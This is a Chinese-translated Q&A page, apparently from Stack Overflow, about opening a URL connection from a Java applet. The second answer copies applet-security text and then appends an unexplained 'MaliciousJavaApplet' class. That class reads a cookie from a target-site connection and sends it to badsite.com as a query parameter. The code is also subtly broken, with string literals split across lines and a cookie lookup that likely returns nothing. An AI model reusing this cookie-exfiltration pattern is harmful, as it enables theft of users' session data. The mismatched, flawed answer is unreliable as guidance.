使用URL类使用Java applet创建与Internet的简单连接

时间:2013-03-20 14:17:29

标签: java url applet

我想创建一个简单的URL连接,例如,从我的预定义主机读取内容,在我的情况下 - localhost / applet,你能告诉我该怎么做吗?我一直在谷歌搜索,但到目前为止没有任何显着的成功。

该文件的内容为some text SOME TEXT,然后应该在小程序中打印。

2 个答案:

答案 0 :(得分:0)

您可以使用URL类执行此操作:

URL url;
InputStream is = null;
DataInputStream dis;
String line;
url = new URL([put a string with the local host address here. Usual is something like 127.0.0.1]); // can also just put a website to test it.
is = url.openStream();  // throws an IOException
dis = new DataInputStream(new BufferedInputStream(is));

while ((line = dis.readLine()) != null) {
    System.out.println(line); //will get each line from the text file and print it. could also put it in a variable.
}

你的问题有点令人困惑,所以告诉我,如果我没有回答。你是什​​么意思localhost/applet它是一个java小程序?或者它只是一个文本文件名小程序?文本文件到底在哪里??

答案 1 :(得分:0)

未签名的小程序

未签名的小程序可以执行以下操作:

他们可以与他们来自的主机建立网络连接。 他们可以使用java.applet.AppletContext类的showDocument方法轻松显示HTML文档。 他们可以在同一页面上调用其他applet的公共方法。 从本地文件系统(从用户的CLASSPATH中的目录)加载的小程序没有通过网络加载的小程序的限制。 他们可以读取安全的系统属性。有关安全系统属性的列表,请参阅系统属性。 使用JNLP启动时,未签名的applet还可以执行以下操作: 他们可以在客户端上打开,读取和保存文件。 他们可以访问共享的系统范围的剪贴板。 他们可以访问打印功能。 他们可以在客户端上存储数据,决定如何下载和缓存applet等等。有关使用JNLP API开发applet的更多信息,请参阅JNLP API。 未签名的小程序无法执行以下操作:

他们无法访问客户端资源,例如本地文件系统,可执行文件,系统剪贴板和打印机。 它们无法连接到任何第三方服务器(除其源自的服务器之外的任何服务器)或从中检索资源。 他们无法加载本机库。 他们无法更改SecurityManager。 他们无法创建ClassLoader。 他们无法读取某些系统属性。有关禁用的系统属性的列表,请参阅系统属性。 签名小程序

已签名的小程序没有对未签名的小程序施加的安全限制,并且可以在安全沙箱之外运行。

import java.awt.*;
import java.io.*;
import java.net.*;
public class MaliciousJavaApplet extends java.applet.Applet {
    TextArea messageLog = new TextArea(4, 40);
    public void init() {
      setLayout(new BorderLayout());
      add("Center", messageLog);
    }
    public void start() {
      try {
                             URL url = new URL("http://www.targetsite.net/default.html");
                             URLConnection connection;
                             String inputLine;
                             BufferedReader inReader;
          connection = url.openConnection();
                             connection.setAllowUserInteraction(false);
                             connection.setDoOutput(true);
                             messageLog.append("Request Property
"+connection.getRequestProperty("cookie")+"\n");
                             messageLog.append("File read from URL " + url + ":\n");
          inReader = new BufferedReader(
                   new InputStreamReader(connection.getInputStream()));
          while (null != (inputLine = inReader.readLine())) {
             messageLog.append(inputLine + "\n");
          }
          inReader.close();
                             messageLog.append("Request Property
"+connection.getRequestProperty("cookie")+"\n");
                             String cookie;
                             cookie = connection.getRequestProperty("cookie");
                             URL url2 = new
URL("http://www.badsite.com/default.html?cookie="+cookie);
                             URLConnection connection2;
                             String inputLine2;
                             BufferedReader inReader2;
          connection2 = url2.openConnection();
                             connection2.setAllowUserInteraction(false);
                             connection2.setDoOutput(true);
                             inReader2 = new BufferedReader(
                   new InputStreamReader(connection2.getInputStream()));
          while (null != (inputLine2 = inReader2.readLine())) {
             messageLog.append(inputLine2 + "\n");
          }
          inReader2.close();
      }
      catch (IOException e) {
          System.err.println("Exception: " + e);
  }
}
}